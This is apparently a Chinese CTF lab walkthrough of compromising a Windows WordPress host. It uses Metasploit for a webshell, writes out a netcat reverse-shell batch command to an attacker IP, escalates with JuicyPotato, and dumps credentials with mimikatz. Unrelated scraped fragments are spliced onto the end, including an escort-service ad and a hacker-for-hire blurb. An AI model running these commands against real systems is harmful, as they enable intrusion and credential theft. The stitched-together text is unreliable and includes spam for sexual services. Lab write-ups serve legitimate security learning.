目标网站ip:10.10.10.29最终目的:拿到flag,提升到管理员权限。
发现开放了80和3306俩个端口
发现有个登录页面,根据提示是上个靶场的账号和密码,登录进去
账号:admin
密码:P@s5w0rd!
msfconsole //进入kali的metasploit攻击框架
search wp_admin? //查找wordpress获取webshell的利用模块
use 0? //使用编号为0的模块
show options //显示设置需要配置的参数
设置参数
成功获得权限,但回连之后特别容易断
查看系统信息
Kaili端就会返回一个cmd命令行
用刚才获取到的nc shell在目标机器上生成一个批处理文件,目的是让netcat将靶机的powershell发送至kali的1111端口
echo START C:\inetpub\wwwroot\wordpress\wp-content?ds c64.exe -e powershell.exe 10.10.14.6 1111 > shell.bat
使用多汁的土豆这个工具去执行生成shell.bat,并设置监听端口1111
JP.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content?ds ihao.bat -l 1337
但奇怪的是,1111端口一直没有返回监听,可能设置出来问题我就改了端口,改为了4567就返回了shell,提权成功,是管理员权限
上传mimikatz到靶机上去
执行mimikatz命令获取域内账户和密码
获得了一个账号名:sandra 密码:Password1234!
2015年全球网络安全市场价值1054.5亿美元,预计到2021年将达到1817.7亿美元,预计2016年至2021年CAGR将增长9.5%。 网络安全与信息技术安全相关,信息技术安全的重点是保...
北京市商务接待高端小学妹做兼职小学妹燕燕在线预约【赵大芬】,上海市是一座成功者的集中地,对商业服务女学妹的要求也是较为大的,今日大牌明星商务共享女学妹访梦,年纪深圳市 女 27,婚姻生活:单身,文凭:...
初学黑客用什么电脑(想当黑客初学学什么)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑...
黑客的脑洞是无穷的,前不久雷锋网报道过一起玩坏机载娱乐系统事件,昨天外媒就又报道了恶作剧搞乱飓风警报事件。 今年3月12日凌晨两点半,德州两个城镇的居民突然被惊醒了,突如其来的飓风警报让他们陷...
. 狐臭是属于一种汗液疾病,主要是会影响日常的交往,对心理有一定的损害,青春期的孩子是很容易出现汗液问题的,那么,孩子有狐臭怎么办呢?接下来友谊长存小编就来说一说。 怎么判断是否有狐臭 狐臭,是...
怎么根据车牌号定位(我想找车在哪里怎么找)识别流程 牌照自动识别是一项利用车辆的动态视频或静态图像进行牌照号码、牌照颜色自动识别的模式识别技术。其硬件基础一般包括触发设备(监测车辆是否进入视野)、摄...